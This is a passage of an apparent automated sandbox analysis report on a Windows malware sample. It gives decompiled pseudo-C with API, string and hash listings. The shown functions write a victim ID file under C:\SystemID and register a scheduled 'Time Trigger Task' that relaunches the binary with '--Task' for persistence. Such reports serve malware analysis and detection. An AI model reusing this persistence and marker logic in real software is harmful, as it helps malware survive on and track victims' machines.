                                                                                    											} else {
                                                                                    												_t191 =  *_t219;
                                                                                    											}
                                                                                    											_t112 = _a20;
                                                                                    											__eflags = _t112;
                                                                                    											if(_t112 != 0) {
                                                                                    												__eflags = _t191 + _t213 + _t185;
                                                                                    												E004205A0(_t191 + _t213 + _t185, _a12 + _t213 + _t207, _t112);
                                                                                    												_t226 = _t226 + 0xc;
                                                                                    											}
                                                                                    											_t113 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                    											__eflags = _t113 - 0x10;
                                                                                    											if(_t113 < 0x10) {
                                                                                    												_a12 = _t219;
                                                                                    											} else {
                                                                                    												_a12 =  *_t219;
                                                                                    											}
                                                                                    											__eflags = _t113 - 0x10;
                                                                                    											if(_t113 < 0x10) {
                                                                                    												_t208 = _t219;
                                                                                    											} else {
                                                                                    												_t208 =  *_t219;
                                                                                    											}
                                                                                    											_t192 = _a8;
                                                                                    											_t115 = _t185 - _t192;
                                                                                    											__eflags = _t115;
                                                                                    											if(_t115 != 0) {
                                                                                    												_push(_t115);
                                                                                    												_push(_a12 + _a16 + _t185);
                                                                                    												_t124 = _t213 + _t208 + _t192;
                                                                                    												__eflags = _t124;
                                                                                    												goto L96;
                                                                                    											}
                                                                                    										} else {
                                                                                    											__eflags = _t110 - 0x10;
                                                                                    											if(_t110 < 0x10) {
                                                                                    												_a4 = _t219;
                                                                                    											} else {
                                                                                    												_a4 =  *_t219;
                                                                                    												_t207 = _a8;
                                                                                    											}
                                                                                    											__eflags = _t110 - 0x10;
                                                                                    											if(_t110 < 0x10) {
                                                                                    												_a12 = _t219;
                                                                                    											} else {
                                                                                    												_a12 =  *_t219;
                                                                                    											}
                                                                                    											__eflags = _t189;
                                                                                    											if(_t189 != 0) {
                                                                                    												__eflags = _a12 + _t213 + _t185;
                                                                                    												E004205A0(_a12 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
                                                                                    												_t207 = _a8;
                                                                                    												_t226 = _t226 + 0xc;
                                                                                    											}
                                                                                    											_t197 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                    											__eflags = _t197 - 0x10;
                                                                                    											if(_t197 < 0x10) {
                                                                                    												_t136 = _t219;
                                                                                    											} else {
                                                                                    												_t136 =  *_t219;
                                                                                    											}
                                                                                    											__eflags = _t197 - 0x10;
                                                                                    											if(_t197 < 0x10) {
                                                                                    												_t198 = _t219;
                                                                                    											} else {
                                                                                    												_t198 =  *_t219;
                                                                                    											}
                                                                                    											__eflags = _t185;
                                                                                    											if(_t185 != 0) {
                                                                                    												_push(_t185);
                                                                                    												_push(_t136 - _t207 + _a16 + _t185);
                                                                                    												_t124 = _t198 + _t213;
                                                                                    												goto L96;
                                                                                    											}
                                                                                    										}
                                                                                    									} else {
                                                                                    										_t148 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                    										__eflags = _t148 - 0x10;
                                                                                    										if(_t148 < 0x10) {
                                                                                    											_a4 = _t219;
                                                                                    										} else {
                                                                                    											_a4 =  *_t219;
                                                                                    											_t207 = _a8;
                                                                                    										}
                                                                                    										__eflags = _t148 - 0x10;
                                                                                    										if(_t148 < 0x10) {
                                                                                    											_a8 = _t219;
                                                                                    										} else {
                                                                                    											_a8 =  *_t219;
                                                                                    										}
                                                                                    										__eflags = _t189;
                                                                                    										if(_t189 != 0) {
                                                                                    											__eflags = _a8 + _t213 + _t185;
                                                                                    											E004205A0(_a8 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
                                                                                    											_t226 = _t226 + 0xc;
                                                                                    										}
                                                                                    										_t149 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                    										__eflags = _t149 - 0x10;
                                                                                    										if(_t149 < 0x10) {
                                                                                    											_t210 = _t219;
                                                                                    										} else {
                                                                                    											_t210 =  *_t219;
                                                                                    										}
                                                                                    										__eflags = _t149 - 0x10;
                                                                                    										if(_t149 < 0x10) {
                                                                                    											_t199 = _t219;
                                                                                    										} else {
                                                                                    											_t199 =  *_t219;
                                                                                    										}
                                                                                    										__eflags = _t185;
                                                                                    										if(_t185 != 0) {
                                                                                    											_push(_t185);
                                                                                    											_push(_a16 + _t210);
                                                                                    											_t124 = _t199 + _t213;
                                                                                    											goto L96;
                                                                                    										}
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t160 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                    									__eflags = _t160 - 0x10;
                                                                                    									if(_t160 < 0x10) {
                                                                                    										_a4 = _t219;
                                                                                    									} else {
                                                                                    										_a4 =  *_t219;
                                                                                    									}
                                                                                    									__eflags = _t160 - 0x10;
                                                                                    									if(_t160 < 0x10) {
                                                                                    										_t200 = _t219;
                                                                                    									} else {
                                                                                    										_t200 =  *_t219;
                                                                                    									}
                                                                                    									__eflags = _t185;
                                                                                    									if(_t185 != 0) {
                                                                                    										__eflags = _a4 + _a16;
                                                                                    										E004205A0(_t200 + _t213, _a4 + _a16, _t185);
                                                                                    										_t207 = _a8;
                                                                                    										_t226 = _t226 + 0xc;
                                                                                    									}
                                                                                    									_t161 =  *((intOrPtr*)(_t219 + 0x14));
                                                                                    									__eflags = _t161 - 0x10;
                                                                                    									if(_t161 < 0x10) {
                                                                                    										_a8 = _t219;
                                                                                    									} else {
                                                                                    										_a8 =  *_t219;
                                                                                    									}
                                                                                    									__eflags = _t161 - 0x10;
                                                                                    									if(_t161 < 0x10) {
                                                                                    										_t201 = _t219;
                                                                                    									} else {
                                                                                    										_t201 =  *_t219;
                                                                                    									}
                                                                                    									_t162 = _a20;
                                                                                    									__eflags = _t162;
                                                                                    									if(_t162 != 0) {
                                                                                    										_push(_t162);
                                                                                    										_push(_a8 + _t213 + _t207);
                                                                                    										_t124 = _t201 + _t213 + _t185;
                                                                                    										L96:
                                                                                    										_push(_t124);
                                                                                    										E004205A0();
                                                                                    										goto L97;
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
                                                                                    									_a8 = _t219;
                                                                                    								} else {
                                                                                    									_a8 =  *_t219;
                                                                                    									_t213 = _a4;
                                                                                    								}
                                                                                    								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
                                                                                    									_a20 = _t219;
                                                                                    								} else {
                                                                                    									_a20 =  *_t219;
                                                                                    									_t213 = _a4;
                                                                                    								}
                                                                                    								if(_t189 != 0) {
                                                                                    									E004205A0(_a20 + _t213 + _t185, _a8 + _t213 + _t207, _t189);
                                                                                    									_t108 = _a12;
                                                                                    									_t226 = _t226 + 0xc;
                                                                                    								}
                                                                                    								if( *((intOrPtr*)(_t108 + 0x14)) >= 0x10) {
                                                                                    									_t108 =  *_t108;
                                                                                    								}
                                                                                    								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
                                                                                    									_t204 = _t219;
                                                                                    								} else {
                                                                                    									_t204 =  *_t219;
                                                                                    								}
                                                                                    								if(_t185 != 0) {
                                                                                    									E0042D8D0(_t204 + _t213, _t108 + _a16, _t185);
                                                                                    									L97:
                                                                                    								}
                                                                                    							}
                                                                                    							_t193 = _v8;
                                                                                    							 *(_t219 + 0x10) = _t193;
                                                                                    							if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
                                                                                    								_t116 = _t219;
                                                                                    								 *((char*)(_t116 + _t193)) = 0;
                                                                                    								return _t116;
                                                                                    							} else {
                                                                                    								 *((char*)( *_t219 + _t193)) = 0;
                                                                                    								return _t219;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}









































                                                                                    0x004181cb
                                                                                    0x004180f7
                                                                                    0x004180f7
                                                                                    0x004180fa
                                                                                    0x004180fd
                                                                                    0x00418106
                                                                                    0x004180ff
                                                                                    0x00418101
                                                                                    0x00418101
                                                                                    0x00418109
                                                                                    0x0041810c
                                                                                    0x00418112
                                                                                    0x0041810e
                                                                                    0x0041810e
                                                                                    0x0041810e
                                                                                    0x00418114
                                                                                    0x00418116
                                                                                    0x0041811b
                                                                                    0x00418124
                                                                                    0x00418129
                                                                                    0x0041812c
                                                                                    0x0041812c
                                                                                    0x0041812f
                                                                                    0x00418132
                                                                                    0x00418135
                                                                                    0x0041813e
                                                                                    0x00418137
                                                                                    0x00418139
                                                                                    0x00418139
                                                                                    0x00418141
                                                                                    0x00418144
                                                                                    0x0041814a
                                                                                    0x00418146
                                                                                    0x00418146
                                                                                    0x00418146
                                                                                    0x0041814c
                                                                                    0x0041814f
                                                                                    0x00418151
                                                                                    0x00418157
                                                                                    0x0041815f
                                                                                    0x00418163
                                                                                    0x00418304
                                                                                    0x00418304
                                                                                    0x00418305
                                                                                    0x00000000
                                                                                    0x00418305
                                                                                    0x00418151
                                                                                    0x0041807e
                                                                                    0x00418082
                                                                                    0x0041808e
                                                                                    0x00418084
                                                                                    0x00418086
                                                                                    0x00418089
                                                                                    0x00418089
                                                                                    0x00418095
                                                                                    0x004180a1
                                                                                    0x00418097
                                                                                    0x00418099
                                                                                    0x0041809c
                                                                                    0x0041809c
                                                                                    0x004180a6
                                                                                    0x004180b9
                                                                                    0x004180be
                                                                                    0x004180c1
                                                                                    0x004180c1
                                                                                    0x004180c8
                                                                                    0x004180ca
                                                                                    0x004180ca
                                                                                    0x004180d0
                                                                                    0x004180d6
                                                                                    0x004180d2
                                                                                    0x004180d2
                                                                                    0x004180d2
                                                                                    0x004180da
                                                                                    0x004180e9
                                                                                    0x0041830a
                                                                                    0x0041830a
                                                                                    0x004180da
                                                                                    0x00418311
                                                                                    0x00418314
                                                                                    0x00418318
                                                                                    0x0041832a
                                                                                    0x0041832e
                                                                                    0x00418335
                                                                                    0x0041831a
                                                                                    0x0041831d
                                                                                    0x00418327
                                                                                    0x00418327
                                                                                    0x00418318
                                                                                    0x0041804f
                                                                                    0x00418022

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 4104443479-4289949731
                                                                                    • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                    • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                    • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                    • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 84%
                                                                                    			E0040C740(char _a4, intOrPtr _a20, intOrPtr _a24) {
                                                                                    				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				signed int _v28;
                                                                                    				signed int _v32;
                                                                                    				intOrPtr _v36;
                                                                                    				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                    				struct _SECURITY_ATTRIBUTES* _v56;
                                                                                    				char _v316;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				intOrPtr _t77;
                                                                                    				intOrPtr _t79;
                                                                                    				signed int _t86;
                                                                                    				void* _t92;
                                                                                    				void* _t95;
                                                                                    				void* _t96;
                                                                                    				signed int _t98;
                                                                                    				struct _SECURITY_ATTRIBUTES** _t101;
                                                                                    				DWORD* _t109;
                                                                                    				void* _t117;
                                                                                    				signed int _t121;
                                                                                    				intOrPtr _t123;
                                                                                    				intOrPtr* _t126;
                                                                                    				signed int _t127;
                                                                                    				signed int _t128;
                                                                                    				signed int _t138;
                                                                                    				intOrPtr _t141;
                                                                                    				signed int _t142;
                                                                                    				signed int _t143;
                                                                                    				intOrPtr _t144;
                                                                                    				signed int _t146;
                                                                                    				signed int _t147;
                                                                                    				signed int _t150;
                                                                                    				intOrPtr _t151;
                                                                                    				void* _t153;
                                                                                    				void* _t155;
                                                                                    				void* _t156;
                                                                                    
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4ca7b8);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t151;
                                                                                    				_v8 = 0;
                                                                                    				_t121 = 0;
                                                                                    				_t138 = 0;
                                                                                    				_v32 = 0;
                                                                                    				_t141 = 0;
                                                                                    				_v28 = 0;
                                                                                    				_v24 = 0;
                                                                                    				_v8 = 1;
                                                                                    				_t77 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "r");
                                                                                    				_t153 = _t151 - 0x130 + 8;
                                                                                    				_v20 = _t77;
                                                                                    				if(_t77 == 0) {
                                                                                    					L28:
                                                                                    					_t142 = _t121;
                                                                                    					if(_t121 == _t138) {
                                                                                    						L32:
                                                                                    						CreateDirectoryW(L"C:\\SystemID", 0);
                                                                                    						_t79 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "w");
                                                                                    						_t153 = _t153 + 8;
                                                                                    						_v20 = _t79;
                                                                                    						if(_t79 != 0) {
                                                                                    							_t143 = _t121;
                                                                                    							__eflags = _t121 - _t138;
                                                                                    							if(_t121 == _t138) {
                                                                                    								L47:
                                                                                    								__eflags = _a24 - 8;
                                                                                    								_t144 = _v20;
                                                                                    								_t81 =  >=  ? _a4 :  &_a4;
                                                                                    								_push(_t144);
                                                                                    								_push( >=  ? _a4 :  &_a4);
                                                                                    								E004228FD(_t121, _t135, _t138, _t144, __eflags);
                                                                                    								_push(_t144);
                                                                                    								_push("\n");
                                                                                    								E004228FD(_t121, _t135, _t138, _t144, __eflags);
                                                                                    								_push(_t144);
                                                                                    								_t79 = E00423A38(_t121, _t138, _t144, __eflags);
                                                                                    								_t153 = _t153 + 0x14;
                                                                                    								__eflags = _t121;
                                                                                    								if(_t121 == 0) {
                                                                                    									L54:
                                                                                    									if(_a24 >= 8) {
                                                                                    										_t79 = L00422587(_a4);
                                                                                    									}
                                                                                    									 *[fs:0x0] = _v16;
                                                                                    									return _t79;
                                                                                    								}
                                                                                    								_t146 = _t121;
                                                                                    								__eflags = _t121 - _t138;
                                                                                    								if(_t121 == _t138) {
                                                                                    									L53:
                                                                                    									_t79 = L00422587(_t121);
                                                                                    									_t153 = _t153 + 4;
                                                                                    									goto L54;
                                                                                    								}
                                                                                    								do {
                                                                                    									__eflags =  *((intOrPtr*)(_t146 + 0x14)) - 8;
                                                                                    									if( *((intOrPtr*)(_t146 + 0x14)) >= 8) {
                                                                                    										L00422587( *_t146);
                                                                                    										_t153 = _t153 + 4;
                                                                                    									}
                                                                                    									 *((intOrPtr*)(_t146 + 0x14)) = 7;
                                                                                    									 *(_t146 + 0x10) = 0;
                                                                                    									 *_t146 = 0;
                                                                                    									_t146 = _t146 + 0x18;
                                                                                    									__eflags = _t146 - _t138;
                                                                                    								} while (_t146 != _t138);
                                                                                    								goto L53;
                                                                                    							}
                                                                                    							_t123 = _v20;
                                                                                    							do {
                                                                                    								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 8;
                                                                                    								if(__eflags < 0) {
                                                                                    									_t86 = _t143;
                                                                                    								} else {
                                                                                    									_t86 =  *_t143;
                                                                                    								}
                                                                                    								_push(_t123);
                                                                                    								_push(_t86);
                                                                                    								E004228FD(_t123, _t135, _t138, _t143, __eflags);
                                                                                    								_t143 = _t143 + 0x18;
                                                                                    								_t153 = _t153 + 8;
                                                                                    								__eflags = _t143 - _t138;
                                                                                    							} while (_t143 != _t138);
                                                                                    							_t121 = _v32;
                                                                                    							goto L47;
                                                                                    						}
                                                                                    						L33:
                                                                                    						if(_t121 == 0) {
                                                                                    							goto L54;
                                                                                    						}
                                                                                    						_t147 = _t121;
                                                                                    						if(_t121 == _t138) {
                                                                                    							goto L53;
                                                                                    						}
                                                                                    						do {
                                                                                    							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
                                                                                    								L00422587( *_t147);
                                                                                    								_t153 = _t153 + 4;
                                                                                    							}
                                                                                    							 *((intOrPtr*)(_t147 + 0x14)) = 7;
                                                                                    							 *(_t147 + 0x10) = 0;
                                                                                    							 *_t147 = 0;
                                                                                    							_t147 = _t147 + 0x18;
                                                                                    						} while (_t147 != _t138);
                                                                                    						goto L53;
                                                                                    					}
                                                                                    					while(1) {
                                                                                    						_t91 =  >=  ? _a4 :  &_a4;
                                                                                    						_t79 = E00414C60(_t142,  >=  ? _a4 :  &_a4, 0, _a20);
                                                                                    						if(_t79 != 0xffffffff) {
                                                                                    							goto L33;
                                                                                    						}
                                                                                    						_t142 = _t142 + 0x18;
                                                                                    						if(_t142 != _t138) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						goto L32;
                                                                                    					}
                                                                                    					goto L33;
                                                                                    				}
                                                                                    				_t92 = E00420546(_t77);
                                                                                    				_t155 = _t153 + 4;
                                                                                    				_t158 = _t92;
                                                                                    				if(_t92 != 0) {
                                                                                    					L27:
                                                                                    					_push(_v20);
                                                                                    					E00423A38(_t121, _t138, _t141, _t166);
                                                                                    					_t153 = _t155 + 4;
                                                                                    					goto L28;
                                                                                    				} else {
                                                                                    					do {
                                                                                    						_push(_v20);
                                                                                    						_push(0x7e);
                                                                                    						_push( &_v316);
                                                                                    						_t95 = E00421101(_t121, _t138, _t141, _t158);
                                                                                    						_t156 = _t155 + 0xc;
                                                                                    						if(_t95 == 0) {
                                                                                    							goto L26;
                                                                                    						}
                                                                                    						_v36 = 7;
                                                                                    						_v40 = 0;
                                                                                    						_v56 = 0;
                                                                                    						if(_v316 != 0) {
                                                                                    							_t126 =  &_v316;
                                                                                    							_t14 = _t126 + 2; // 0x3
                                                                                    							_t135 = _t14;
                                                                                    							do {
                                                                                    								_t98 =  *_t126;
                                                                                    								_t126 = _t126 + 2;
                                                                                    								__eflags = _t98;
                                                                                    							} while (_t98 != 0);
                                                                                    							_t127 = _t126 - _t135;
                                                                                    							__eflags = _t127;
                                                                                    							_t128 = _t127 >> 1;
                                                                                    							goto L9;
                                                                                    						} else {
                                                                                    							_t128 = 0;
                                                                                    							L9:
                                                                                    							_push(_t128);
                                                                                    							_t129 =  &_v56;
                                                                                    							E00415C10(_t121,  &_v56, _t138, _t141,  &_v316);
                                                                                    							_t101 =  &_v56;
                                                                                    							_v8 = 2;
                                                                                    							if(_t101 >= _t138 || _t121 > _t101) {
                                                                                    								__eflags = _t138 - _t141;
                                                                                    								if(_t138 == _t141) {
                                                                                    									E00414F70(_t121,  &_v32, _t138, _t129);
                                                                                    									_t138 = _v28;
                                                                                    									_t121 = _v32;
                                                                                    								}
                                                                                    								__eflags = _t138;
                                                                                    								if(_t138 != 0) {
                                                                                    									 *((intOrPtr*)(_t138 + 0x14)) = 7;
                                                                                    									 *(_t138 + 0x10) = 0;
                                                                                    									 *_t138 = 0;
                                                                                    									__eflags = _v36 - 8;
                                                                                    									if(_v36 >= 8) {
                                                                                    										 *_t138 = _v56;
                                                                                    										_v56 = 0;
                                                                                    									} else {
                                                                                    										_t109 =  &(_v40->nLength);
                                                                                    										__eflags = _t109;
                                                                                    										if(_t109 != 0) {
                                                                                    											E004205A0(_t138,  &_v56, _t109 + _t109);
                                                                                    											_t156 = _t156 + 0xc;
                                                                                    										}
                                                                                    									}
                                                                                    									 *(_t138 + 0x10) = _v40;
                                                                                    									 *((intOrPtr*)(_t138 + 0x14)) = _v36;
                                                                                    									__eflags = 0;
                                                                                    									_v36 = 7;
                                                                                    									_v40 = 0;
                                                                                    									_v56 = 0;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t132 = _t101 - _t121;
                                                                                    								_t135 = 0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2;
                                                                                    								_t150 = (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2);
                                                                                    								if(_t138 == _v24) {
                                                                                    									E00414F70(_t121,  &_v32, _t138, _t132);
                                                                                    									_t138 = _v28;
                                                                                    									_t121 = _v32;
                                                                                    								}
                                                                                    								_t117 = _t121 + (_t150 + _t150 * 2) * 8;
                                                                                    								if(_t138 != 0) {
                                                                                    									SetUserObjectSecurity(_t117, ??, ??);
                                                                                    								}
                                                                                    							}
                                                                                    							_t138 = _t138 + 0x18;
                                                                                    							_v8 = 1;
                                                                                    							_v28 = _t138;
                                                                                    							if(_v36 >= 8) {
                                                                                    								L00422587(_v56);
                                                                                    								_t156 = _t156 + 4;
                                                                                    							}
                                                                                    							_t141 = _v24;
                                                                                    						}
                                                                                    						L26:
                                                                                    						_t96 = E00420546(_v20);
                                                                                    						_t155 = _t156 + 4;
                                                                                    						_t166 = _t96;
                                                                                    					} while (_t96 == 0);
                                                                                    					goto L27;
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                      • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                    • _fgetws.LIBCMT ref: 0040C7BC
                                                                                    • SetUserObjectSecurity.USER32 ref: 0040C85A
                                                                                    • _memmove.LIBCMT ref: 0040C89F
                                                                                    • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryObjectSecurityUser__wfsopen_fgetws_memmove
                                                                                    • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                    • API String ID: 3961525514-54166481
                                                                                    • Opcode ID: b56586a0f40a47d2a110a6b2cb5378090d00edeb6589163c5e05a767808c7587
                                                                                    • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                    • Opcode Fuzzy Hash: b56586a0f40a47d2a110a6b2cb5378090d00edeb6589163c5e05a767808c7587
                                                                                    • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 56%
                                                                                    			E0040DAC0(char _a4, intOrPtr _a24) {
                                                                                    				intOrPtr _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				void* _v20;
                                                                                    				void* _v24;
                                                                                    				void* _v28;
                                                                                    				void* _v32;
                                                                                    				void* _v36;
                                                                                    				char _v40;
                                                                                    				char _v44;
                                                                                    				intOrPtr _v60;
                                                                                    				intOrPtr _v76;
                                                                                    				short _v84;
                                                                                    				intOrPtr _v88;
                                                                                    				char _v92;
                                                                                    				short _v20572;
                                                                                    				void* _t61;
                                                                                    				intOrPtr* _t63;
                                                                                    				intOrPtr* _t65;
                                                                                    				intOrPtr* _t67;
                                                                                    				intOrPtr* _t69;
                                                                                    				intOrPtr* _t71;
                                                                                    				intOrPtr* _t73;
                                                                                    				intOrPtr* _t75;
                                                                                    				intOrPtr* _t83;
                                                                                    				intOrPtr* _t85;
                                                                                    				intOrPtr* _t87;
                                                                                    				intOrPtr* _t93;
                                                                                    				intOrPtr* _t95;
                                                                                    				intOrPtr* _t97;
                                                                                    				intOrPtr* _t98;
                                                                                    				intOrPtr* _t100;
                                                                                    				intOrPtr _t129;
                                                                                    
                                                                                    				 *[fs:0x0] = _t129;
                                                                                    				_t61 = E0042F7C0(0x504c);
                                                                                    				_v8 = 0;
                                                                                    				__imp__CoInitialize(0,  *[fs:0x0], 0x4ca948, 0xffffffff);
                                                                                    				if(_t61 >= 0) {
                                                                                    					__imp__CoCreateInstance(0x4d4f6c, 0, 1, 0x4d4f3c,  &_v24);
                                                                                    					_t63 = _v24;
                                                                                    					_push( &_v20);
                                                                                    					_push(0x4d4f8c);
                                                                                    					_push(0x4d4f9c);
                                                                                    					_push(L"Time Trigger Task");
                                                                                    					_push(_t63);
                                                                                    					if( *((intOrPtr*)( *_t63 + 0x20))() != 0) {
                                                                                    						_t98 = _v24;
                                                                                    						 *((intOrPtr*)( *_t98 + 0x1c))(_t98, L"Time Trigger Task");
                                                                                    						_t100 = _v24;
                                                                                    						 *((intOrPtr*)( *_t100 + 0x20))(_t100, L"Time Trigger Task", 0x4d4f9c, 0x4d4f8c,  &_v20);
                                                                                    					}
                                                                                    					_t65 = _v20;
                                                                                    					 *((intOrPtr*)( *_t65))(_t65, 0x4cf2e8,  &_v36);
                                                                                    					_t67 = _v36;
                                                                                    					 *((intOrPtr*)( *_t67 + 0x18))(_t67, 0, 1);
                                                                                    					_t69 = _v20;
                                                                                    					 *((intOrPtr*)( *_t69))(_t69, 0x4d4f7c,  &_v44);
                                                                                    					_t71 = _v20;
                                                                                    					 *((intOrPtr*)( *_t71 + 0x78))(_t71, 0x500078, 0);
                                                                                    					_t73 = _v20;
                                                                                    					_t122 =  >=  ? _a4 :  &_a4;
                                                                                    					 *((intOrPtr*)( *_t73 + 0x80))(_t73,  >=  ? _a4 :  &_a4);
                                                                                    					_t75 = _v20;
                                                                                    					 *((intOrPtr*)( *_t75 + 0x88))(_t75, L"--Task");
                                                                                    					_t78 =  >=  ? _a4 :  &_a4;
                                                                                    					lstrcpyW( &_v20572,  >=  ? _a4 :  &_a4);
                                                                                    					PathRemoveFileSpecW( &_v20572);
                                                                                    					_t83 = _v20;
                                                                                    					 *((intOrPtr*)( *_t83 + 0x90))(_t83,  &_v20572);
                                                                                    					_t85 = _v20;
                                                                                    					 *((intOrPtr*)( *_t85 + 0x48))(_t85, L"Comment");
                                                                                    					_t87 = _v20;
                                                                                    					_v28 = 0;
                                                                                    					_v32 = 0;
                                                                                    					_v40 = 0;
                                                                                    					 *((intOrPtr*)( *_t87 + 0xc))(_t87,  &_v40,  &_v28);
                                                                                    					E0042B420( &_v92, 0, 0x30);
                                                                                    					_v88 = 0xb07e2;
                                                                                    					_v92 = 0x30;
                                                                                    					_t129 = _t129 + 0xc;
                                                                                    					_v84 = 1;
                                                                                    					_t93 = _v28;
                                                                                    					_v76 = 0x21000c;
                                                                                    					_v60 = 0;
                                                                                    					 *((intOrPtr*)( *_t93 + 0xc))(_t93,  &_v92);
                                                                                    					_t95 = _v20;
                                                                                    					 *((intOrPtr*)( *_t95))(_t95, 0x4cf2e8,  &_v32);
                                                                                    					_t97 = _v32;
                                                                                    					_t61 =  *((intOrPtr*)( *_t97 + 0x18))(_t97, 0, 0);
                                                                                    					__imp__CoUninitialize();
                                                                                    				}
                                                                                    				if(_a24 >= 8) {
                                                                                    					_t61 = L00422587(_a4);
                                                                                    				}
                                                                                    				 *[fs:0x0] = _v16;
                                                                                    				return _t61;
                                                                                    			}

                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                    • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                    • lstrcpyW.KERNEL32 ref: 0040DBD6
                                                                                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                    • _memset.LIBCMT ref: 0040DC38
                                                                                    • CoUninitialize.OLE32 ref: 0040DC92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                    • String ID: --Task$Comment$Time Trigger Task
                                                                                    • API String ID: 330603062-1376107329
                                                                                    • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                    • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                    • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                    • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00411A10() {
                                                                                    				long _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr _v28;
                                                                                    				struct _SERVICE_STATUS _v32;
                                                                                    				void* _t9;
                                                                                    				int _t10;
                                                                                    				intOrPtr _t16;
                                                                                    				void* _t19;
                                                                                    				intOrPtr _t23;
                                                                                    				void* _t26;
